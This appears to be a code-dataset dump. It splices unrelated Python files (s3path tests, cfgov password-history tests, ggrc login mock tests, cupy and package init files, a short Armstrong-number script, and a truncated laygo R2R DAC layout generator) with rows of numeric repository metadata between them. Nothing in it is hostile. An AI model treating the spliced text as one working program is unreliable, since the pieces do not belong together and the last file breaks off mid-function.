def test_read_bytes(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
assert path.read_bytes() == b'test data'
def test_open_text_read(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
with path.open(mode='r') as file_obj:
assert file_obj.readlines() == ['test data']
with path.open(mode='rt') as file_obj:
assert file_obj.readline() == 'test data'
assert file_obj.readline() == ''
assert file_obj.readline() == ''
@pytest.mark.skipif(sys.version_info < (3, 5), reason="requires python3.5 or higher")
def test_read_text(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
assert path.read_text() == 'test data'
def test_owner(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
assert path.owner() == 'webfile'
def test_rename_s3_to_s3(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
s3.create_bucket(Bucket='target-bucket')
S3Path('/test-bucket/docs/conf.py').rename('/test-bucket/docs/conf1.py')
assert not S3Path('/test-bucket/docs/conf.py').exists()
assert S3Path('/test-bucket/docs/conf1.py').is_file()
path = S3Path('/test-bucket/docs/')
path.rename(S3Path('/target-bucket') / S3Path('folder'))
assert not path.exists()
assert S3Path('/target-bucket/folder/conf1.py').is_file()
assert S3Path('/target-bucket/folder/make.bat').is_file()
assert S3Path('/target-bucket/folder/index.rst').is_file()
assert S3Path('/target-bucket/folder/Makefile').is_file()
assert S3Path('/target-bucket/folder/_templates/11conf.py').is_file()
assert S3Path('/target-bucket/folder/_build/22conf.py').is_file()
assert S3Path('/target-bucket/folder/_static/conf.py').is_file()
def test_replace_s3_to_s3(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
s3.create_bucket(Bucket='target-bucket')
S3Path('/test-bucket/docs/conf.py').replace('/test-bucket/docs/conf1.py')
assert not S3Path('/test-bucket/docs/conf.py').exists()
assert S3Path('/test-bucket/docs/conf1.py').is_file()
path = S3Path('/test-bucket/docs/')
path.replace(S3Path('/target-bucket') / S3Path('folder'))
assert not path.exists()
assert S3Path('/target-bucket/folder/conf1.py').is_file()
assert S3Path('/target-bucket/folder/make.bat').is_file()
assert S3Path('/target-bucket/folder/index.rst').is_file()
assert S3Path('/target-bucket/folder/Makefile').is_file()
assert S3Path('/target-bucket/folder/_templates/11conf.py').is_file()
assert S3Path('/target-bucket/folder/_build/22conf.py').is_file()
assert S3Path('/target-bucket/folder/_static/conf.py').is_file()
def test_rmdir(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
conf_path = S3Path('/test-bucket/docs/_templates')
assert conf_path.is_dir()
conf_path.rmdir()
assert not conf_path.exists()
path = S3Path('/test-bucket/docs/')
path.rmdir()
assert not path.exists()
def test_mkdir(s3_mock):
s3 = boto3.resource('s3')
S3Path('/test-bucket/').mkdir()
assert s3.Bucket('test-bucket') in s3.buckets.all()
S3Path('/test-bucket/').mkdir(exist_ok=True)
with pytest.raises(FileExistsError):
S3Path('/test-bucket/').mkdir(exist_ok=False)
with pytest.raises(FileNotFoundError):
S3Path('/test-second-bucket/test-directory/file.name').mkdir()
S3Path('/test-second-bucket/test-directory/file.name').mkdir(parents=True)
assert s3.Bucket('test-second-bucket') in s3.buckets.all()
def test_write_text(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'temp_key')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/temp_key')
data = path.read_text()
assert isinstance(data, str)
path.write_text(data)
assert path.read_text() == data
def test_write_bytes(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'temp_key')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/temp_key')
data = path.read_bytes()
assert isinstance(data, bytes)
path.write_bytes(data)
assert path.read_bytes() == data
def test_unlink(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'temp_key')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/temp_key')
subdir_key = S3Path('/test-bucket/fake_folder/some_key')
subdir_key.write_text("some text")
assert path.exists() is True
assert subdir_key.exists() is True
path.unlink()
assert path.exists() is False
with pytest.raises(FileNotFoundError):
S3Path("/test-bucket/fake_subfolder/fake_subkey").unlink()
with pytest.raises(IsADirectoryError):
S3Path("/test-bucket/fake_folder").unlink()
with pytest.raises(IsADirectoryError):
S3Path("/fake-bucket/").unlink()
| 38.122414 | 113 | 0.684727 | 3,071 | 22,111 | 4.793878 | 0.056985 | 0.133134 | 0.095639 | 0.13884 | 0.847779 | 0.820065 | 0.781483 | 0.742902 | 0.717973 | 0.69875 | 0 | 0.021747 | 0.149428 | 22,111 | 579 | 114 | 38.188256 | 0.761046 | 0.005563 | 0 | 0.602198 | 0 | 0 | 0.2878 | 0.122271 | 0 | 0 | 0 | 0.001727 | 0.215385 | 1 | 0.061538 | false | 0 | 0.017582 | 0 | 0.079121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
37de304d510e1a11209a1d69db17fbdc065f98a8 | 32 | py | Python | build/lib/PyodbcListOfDicts/__init__.py | dariyush/PyodbcListOfDicts | 2143cc787bc367ca03670d3d458bb9382fbbcd62 | [
"MIT"
] | 1 | 2019-10-23T21:03:07.000Z | 2019-10-23T21:03:07.000Z | build/lib/PyodbcListOfDicts/__init__.py | dariyush/PyodbcListOfDicts | 2143cc787bc367ca03670d3d458bb9382fbbcd62 | [
"MIT"
] | null | null | null | build/lib/PyodbcListOfDicts/__init__.py | dariyush/PyodbcListOfDicts | 2143cc787bc367ca03670d3d458bb9382fbbcd62 | [
"MIT"
] | null | null | null | from .PyodbcListOfDicts import * | 32 | 32 | 0.84375 | 3 | 32 | 9 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
37fc7fd3a054326cd30d884615670adb880666fc | 2,603 | py | Python | cfgov/v1/tests/test_signals.py | Mario-Kart-Felix/cfgov-refresh | 7978fedeb7aaf4d96a87720e6545567085e056a9 | [
"CC0-1.0"
] | 1 | 2019-12-29T17:50:07.000Z | 2019-12-29T17:50:07.000Z | cfgov/v1/tests/test_signals.py | ascott1/cfgov-refresh | 9c916aaed3a48110a199eb4675474290a51f815d | [
"CC0-1.0"
] | 1 | 2021-04-22T01:09:52.000Z | 2021-04-22T01:09:52.000Z | cfgov/v1/tests/test_signals.py | ascott1/cfgov-refresh | 9c916aaed3a48110a199eb4675474290a51f815d | [
"CC0-1.0"
] | 1 | 2021-02-02T08:59:38.000Z | 2021-02-02T08:59:38.000Z | from django.contrib.auth.models import User
from django.utils import timezone
from model_mommy import mommy
from unittest import TestCase
class UserSaveTestCase(TestCase):
def make_user(self, password, is_superuser=False):
user = mommy.prepare(User, is_superuser=is_superuser)
user.set_password(password)
user.save()
return user
def test_user_save_new_password_makes_history_item(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
user.set_password('bar')
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertNotEqual(first_phi, new_phi)
self.assertEqual(user.password, new_phi.encrypted_password)
def test_user_save_new_password_not_expired(self):
user = self.make_user(password='foo')
user.set_password('bar')
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertGreater(new_phi.expires_at, timezone.now())
def test_user_save_new_password_locks_password(self):
user = self.make_user(password='foo')
user.set_password('bar')
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertGreater(new_phi.locked_until, timezone.now())
def test_user_save_same_password_no_history_item(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertEqual(first_phi, new_phi)
self.assertEqual(user.password, new_phi.encrypted_password)
def test_user_created_expires_password(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
self.assertLess(first_phi.expires_at, timezone.now())
def test_user_created_unlocks_password(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
self.assertLess(first_phi.locked_until, timezone.now())
def test_superuser_created_does_not_expire_password(self):
user = self.make_user(password='foo', is_superuser=True)
first_phi = user.passwordhistoryitem_set.latest()
self.assertGreater(first_phi.expires_at, timezone.now())
def test_superuser_created_unlocks_password(self):
user = self.make_user(password='foo', is_superuser=True)
first_phi = user.passwordhistoryitem_set.latest()
self.assertLess(first_phi.locked_until, timezone.now())
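# The suite above implies a User post_save handler roughly along these lines
# (a hedged sketch, not the actual cfgov signal): a PasswordHistoryItem is
# created whenever the stored hash changes, with expires_at/locked_until set
# so new regular users start expired/unlocked while superusers do not.
#
#   @receiver(post_save, sender=User)
#   def record_password_history(sender, instance, **kwargs):
#       latest = instance.passwordhistoryitem_set.latest()
#       if latest.encrypted_password != instance.password:
#           instance.passwordhistoryitem_set.create(
#               encrypted_password=instance.password)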
| 37.185714 | 67 | 0.713023 | 326 | 2,603 | 5.377301 | 0.174847 | 0.054763 | 0.148317 | 0.165431 | 0.79806 | 0.79806 | 0.74729 | 0.719338 | 0.659441 | 0.6332 | 0 | 0 | 0.189397 | 2,603 | 69 | 68 | 37.724638 | 0.830806 | 0 | 0 | 0.566038 | 0 | 0 | 0.012678 | 0 | 0 | 0 | 0 | 0 | 0.188679 | 1 | 0.169811 | false | 0.622642 | 0.075472 | 0 | 0.283019 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
532d30f81f1f4682a2f43b12afe253fd93f3a1d6 | 285 | py | Python | cupy/io/__init__.py | weareno1/cupy | ac52cce00b69d97b5d99bd1f91caed720b32b2d3 | [
"MIT"
] | 1 | 2020-11-24T03:44:35.000Z | 2020-11-24T03:44:35.000Z | cupy/io/__init__.py | hephaex/cupy | 5cf50a93bbdebe825337ed7996c464e84b1495ba | [
"MIT"
] | 1 | 2019-08-05T09:36:13.000Z | 2019-08-06T12:03:01.000Z | cupy/io/__init__.py | hephaex/cupy | 5cf50a93bbdebe825337ed7996c464e84b1495ba | [
"MIT"
] | 1 | 2022-03-24T13:19:55.000Z | 2022-03-24T13:19:55.000Z | # Functions from the following NumPy document
# https://docs.scipy.org/doc/numpy/reference/routines.io.html
# "NOQA" to suppress flake8 warning
from cupy.io import formatting # NOQA
from cupy.io import npz # NOQA
from cupy.io import rawfile # NOQA
from cupy.io import text # NOQA
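# illustrative round trip through these routines (cupy.save / cupy.load are
# the NumPy-compatible entry points defined in cupy.io.npz):
#   import cupy
#   cupy.save('/tmp/arr.npy', cupy.arange(4))
#   arr = cupy.load('/tmp/arr.npy')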
| 31.666667 | 61 | 0.761404 | 45 | 285 | 4.822222 | 0.577778 | 0.147465 | 0.184332 | 0.294931 | 0.276498 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004149 | 0.154386 | 285 | 8 | 62 | 35.625 | 0.896266 | 0.550877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5344d61b2c4d56baaa6c4b1355ae60a1f529cebd | 2,416 | py | Python | test/unit/ggrc/test_login.py | mrR2D2/ggrc-core | f4f92628de4490512fcc9511be28e6cf1b875e14 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/unit/ggrc/test_login.py | mrR2D2/ggrc-core | f4f92628de4490512fcc9511be28e6cf1b875e14 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/unit/ggrc/test_login.py | mrR2D2/ggrc-core | f4f92628de4490512fcc9511be28e6cf1b875e14 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-02-13T12:32:45.000Z | 2020-02-13T12:32:45.000Z | # Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Unit test suite for login __init__."""
import unittest
import mock
from ggrc import login
class TestIsExternalAppUser(unittest.TestCase):
"""Unittests for is_external_app_user function."""
@mock.patch('ggrc.login._get_current_logged_user')
def test_no_logged_in_user(self, current_user_mock):
"""No logged in user presented."""
current_user_mock.return_value = None
self.assertFalse(login.is_external_app_user())
current_user_mock.assert_called_once_with()
@mock.patch('ggrc.login._get_current_logged_user')
def test_anonymous_user(self, current_user_mock):
"""Currently logged in user is anonymous."""
user_mock = mock.MagicMock()
user_mock.is_anonymous.return_value = True
current_user_mock.return_value = user_mock
self.assertFalse(login.is_external_app_user())
current_user_mock.assert_called_once_with()
user_mock.is_anonymous.assert_called_once_with()
@mock.patch('ggrc.utils.user_generator.is_app_2_app_user_email')
@mock.patch('ggrc.login._get_current_logged_user')
def test_not_external_user(self, current_user_mock, is_external_email_mock):
"""Currently logged in user is not external app."""
user_mock = mock.MagicMock()
user_mock.email = 'user@example.com'
user_mock.is_anonymous.return_value = False
current_user_mock.return_value = user_mock
is_external_email_mock.return_value = False
self.assertFalse(login.is_external_app_user())
current_user_mock.assert_called_once_with()
user_mock.is_anonymous.assert_called_once_with()
is_external_email_mock.assert_called_once_with('user@example.com')
@mock.patch('ggrc.utils.user_generator.is_app_2_app_user_email')
@mock.patch('ggrc.login._get_current_logged_user')
def test_external_user(self, current_user_mock, is_external_email_mock):
"""Currently logged in user is external app."""
user_mock = mock.MagicMock()
user_mock.email = 'user@example.com'
user_mock.is_anonymous.return_value = False
current_user_mock.return_value = user_mock
is_external_email_mock.return_value = True
self.assertTrue(login.is_external_app_user())
current_user_mock.assert_called_once_with()
user_mock.is_anonymous.assert_called_once_with()
is_external_email_mock.assert_called_once_with('user@example.com')
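# Taken together, the four cases above pin down the expected branching; a
# hedged sketch of the function under test (not the actual ggrc code):
#
#   def is_external_app_user():
#       user = _get_current_logged_user()
#       if not user or user.is_anonymous():
#           return False
#       return is_app_2_app_user_email(user.email)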
| 40.949153 | 78 | 0.782285 | 356 | 2,416 | 4.870787 | 0.185393 | 0.119954 | 0.103806 | 0.103806 | 0.816609 | 0.777393 | 0.732411 | 0.712803 | 0.712803 | 0.712803 | 0 | 0.003761 | 0.119619 | 2,416 | 58 | 79 | 41.655172 | 0.811472 | 0.142798 | 0 | 0.682927 | 0 | 0 | 0.148112 | 0.116724 | 0 | 0 | 0 | 0 | 0.317073 | 1 | 0.097561 | false | 0 | 0.073171 | 0 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
726e86f4ec6e982718ed6592729d317fbc87e92a | 116 | py | Python | test13.py | JarkJiao/Python_learning_TestCase | cc77a7a20b01e230e0edd818532570a7d8853b03 | [
"MIT"
] | null | null | null | test13.py | JarkJiao/Python_learning_TestCase | cc77a7a20b01e230e0edd818532570a7d8853b03 | [
"MIT"
] | null | null | null | test13.py | JarkJiao/Python_learning_TestCase | cc77a7a20b01e230e0edd818532570a7d8853b03 | [
"MIT"
] | null | null | null | for i in range(100,1000):
    a = i // 100      # hundreds digit
    b = i // 10 % 10  # tens digit
    c = i % 10        # units digit
    if i == a**3 + b**3 + c**3:  # three-digit Armstrong (narcissistic) number
        print(i)
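
# A general n-digit narcissistic check (an illustrative sketch):
def is_narcissistic(n):
    digits = [int(d) for d in str(n)]
    return n == sum(d ** len(digits) for d in digits)

assert all(is_narcissistic(n) for n in (153, 370, 371, 407))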
| 16.571429 | 28 | 0.413793 | 26 | 116 | 1.846154 | 0.5 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263889 | 0.37931 | 116 | 6 | 29 | 19.333333 | 0.402778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.166667 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72774332c7c5af6cd4dc03d68d56962a984c8526 | 17 | py | Python | blog/users/urls.py | hyb1713296741/blog | 4daebb4c4b37c51b2cda04b94e395b7d00b29431 | [
"MIT"
] | null | null | null | blog/users/urls.py | hyb1713296741/blog | 4daebb4c4b37c51b2cda04b94e395b7d00b29431 | [
"MIT"
] | null | null | null | blog/users/urls.py | hyb1713296741/blog | 4daebb4c4b37c51b2cda04b94e395b7d00b29431 | [
"MIT"
] | null | null | null | # Routing views for the users sub-application
| 8.5 | 16 | 0.882353 | 1 | 17 | 15 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 17 | 1 | 17 | 17 | 0.9375 | 0.882353 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72f6ab9d2e765f30fb1fe1ac289aa0ac332936e5 | 53,716 | py | Python | laygo/generators/splash/adc_sar_r2rdac_layout_generator.py | tinapiao/Software-IC-Automation | 74b23cd94aa6e4658b110e93b5deb635e014f3a6 | [
"BSD-3-Clause"
] | 26 | 2017-07-07T08:06:31.000Z | 2021-11-25T06:41:24.000Z | laygo/generators/splash/adc_sar_r2rdac_layout_generator.py | tinapiao/Software-IC-Automation | 74b23cd94aa6e4658b110e93b5deb635e014f3a6 | [
"BSD-3-Clause"
] | 9 | 2016-12-28T03:08:29.000Z | 2019-01-30T16:00:28.000Z | laygo/generators/splash/adc_sar_r2rdac_layout_generator.py | tinapiao/Software-IC-Automation | 74b23cd94aa6e4658b110e93b5deb635e014f3a6 | [
"BSD-3-Clause"
] | 10 | 2018-07-14T01:31:28.000Z | 2021-08-21T10:18:30.000Z | #!/usr/bin/python
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
"""ADC library
"""
import laygo
import numpy as np
from math import log
import yaml
import os
import laygo.GridLayoutGeneratorHelper as laygenhelper #utility functions
#import logging;logging.basicConfig(level=logging.DEBUG)
def generate_boundary(laygen, objectname_pfix, placement_grid,
devname_bottom, devname_top, devname_left, devname_right,
shape_bottom=None, shape_top=None, shape_left=None, shape_right=None,
transform_bottom=None, transform_top=None, transform_left=None, transform_right=None,
origin=np.array([0, 0])):
# generate a boundary structure to resolve boundary design rules
pg = placement_grid
# parameters
if shape_bottom == None:
shape_bottom = [np.array([1, 1]) for d in devname_bottom]
if shape_top == None:
shape_top = [np.array([1, 1]) for d in devname_top]
if shape_left == None:
shape_left = [np.array([1, 1]) for d in devname_left]
if shape_right == None:
shape_right = [np.array([1, 1]) for d in devname_right]
if transform_bottom == None:
transform_bottom = ['R0' for d in devname_bottom]
if transform_top == None:
transform_top = ['R0' for d in devname_top]
if transform_left == None:
transform_left = ['R0' for d in devname_left]
if transform_right == None:
transform_right = ['R0' for d in devname_right]
# bottom
dev_bottom = []
dev_bottom.append(laygen.place("I" + objectname_pfix + 'BNDBTM0', devname_bottom[0], pg, xy=origin,
shape=shape_bottom[0], transform=transform_bottom[0]))
for i, d in enumerate(devname_bottom[1:]):
dev_bottom.append(
laygen.relplace(name="I" + objectname_pfix + 'BNDBTM' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_bottom[-1].name,
shape=shape_bottom[i + 1], transform=transform_bottom[i + 1]))
dev_left = []
dev_left.append(laygen.relplace(name="I" + objectname_pfix + 'BNDLFT0', templatename=devname_left[0], gridname=pg,
refinstname=dev_bottom[0].name, direction='top',
shape=shape_left[0], transform=transform_left[0]))
for i, d in enumerate(devname_left[1:]):
dev_left.append(laygen.relplace(name="I" + objectname_pfix + 'BNDLFT' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_left[-1].name, direction='top',
shape=shape_left[i + 1], transform=transform_left[i + 1]))
dev_right = []
dev_right.append(laygen.relplace(name="I" + objectname_pfix + 'BNDRHT0', templatename=devname_right[0], gridname=pg,
refinstname=dev_bottom[-1].name, direction='top',
shape=shape_right[0], transform=transform_right[0]))
for i, d in enumerate(devname_right[1:]):
dev_right.append(
laygen.relplace(name="I" + objectname_pfix + 'BNDRHT' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_right[-1].name, direction='top',
shape=shape_right[i + 1], transform=transform_right[i + 1]))
dev_top = []
dev_top.append(laygen.relplace(name="I" + objectname_pfix + 'BNDTOP0', templatename=devname_top[0], gridname=pg,
refinstname=dev_left[-1].name, direction='top',
shape=shape_top[0], transform=transform_top[0]))
for i, d in enumerate(devname_top[1:]):
dev_top.append(laygen.relplace(name="I" + objectname_pfix + 'BNDTOP' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_top[-1].name,
shape=shape_top[i + 1], transform=transform_top[i + 1]))
return [dev_bottom, dev_top, dev_left, dev_right]
def create_power_pin_from_inst(laygen, layer, gridname, inst_left, inst_right):
"""create power pin"""
rvdd0_pin_xy = laygen.get_inst_pin_xy(inst_left.name, 'VDD', gridname, sort=True)
rvdd1_pin_xy = laygen.get_inst_pin_xy(inst_right.name, 'VDD', gridname, sort=True)
rvss0_pin_xy = laygen.get_inst_pin_xy(inst_left.name, 'VSS', gridname, sort=True)
rvss1_pin_xy = laygen.get_inst_pin_xy(inst_right.name, 'VSS', gridname, sort=True)
laygen.pin(name='VDD', layer=layer, xy=np.vstack((rvdd0_pin_xy[0], rvdd1_pin_xy[1])), gridname=gridname)
laygen.pin(name='VSS', layer=layer, xy=np.vstack((rvss0_pin_xy[0], rvss1_pin_xy[1])), gridname=gridname)
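# illustrative call (assumption: inst_left/inst_right are already-placed
# instances exposing 'VDD'/'VSS' pins on the given grid), e.g.:
#   create_power_pin_from_inst(laygen, laygen.layers['pin'][2], rg_m2m3,
#                              itapl[0], itapr[0])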
def generate_r2rdac_unit(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4,
m=2, m_series=4, origin=np.array([0, 0])):
"""generate clock delay """
    pg = placement_grid
    rg_m2m3 = routing_grid_m2m3
    rg_m3m4 = routing_grid_m3m4
tgate_name = 'tgate_'+str(m)+'x'
# placement
itgate = laygen.place(name="I" + objectname_pfix + 'TG0', templatename=tgate_name,
gridname=pg, xy=origin, template_libname=templib_logic, shape=np.array([m_series,1]))
# reference coordinates
x0 = laygen.get_inst_pin_xy(itgate.name, 'VDD', rg_m2m3, index=[m_series-1, 0])[1][0]
y0 = laygen.get_inst_pin_xy(itgate.name, 'VDD', rg_m2m3, index=[m_series-1, 0])[1][1]
# internal routes
for i in range(m_series-1):
laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(itgate.name, 'O', rg_m3m4, index=[i,0])[0] - [0, i%2],
xy1=laygen.get_inst_pin_xy(itgate.name, 'I', rg_m3m4, index=[i+1,0])[0] - [0, i%2],
gridname0=rg_m3m4, via0=[0,0], via1=[0,0])
ren = laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(itgate.name, 'EN', rg_m3m4, index=[0, 0])[0] + [0, 1],
xy1=laygen.get_inst_pin_xy(itgate.name, 'EN', rg_m3m4, index=[m_series-1, 0])[0] + [0, 1],
gridname0=rg_m3m4)
renb = laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(itgate.name, 'ENB', rg_m3m4, index=[0, 0])[0] + [0, 2],
xy1=laygen.get_inst_pin_xy(itgate.name, 'ENB', rg_m3m4, index=[m_series-1, 0])[0] + [0, 2],
gridname0=rg_m3m4)
for i in range(m_series):
laygen.via(None, laygen.get_inst_pin_xy(itgate.name, 'EN', rg_m3m4, index=[i, 0])[0] + [0, 1], rg_m3m4)
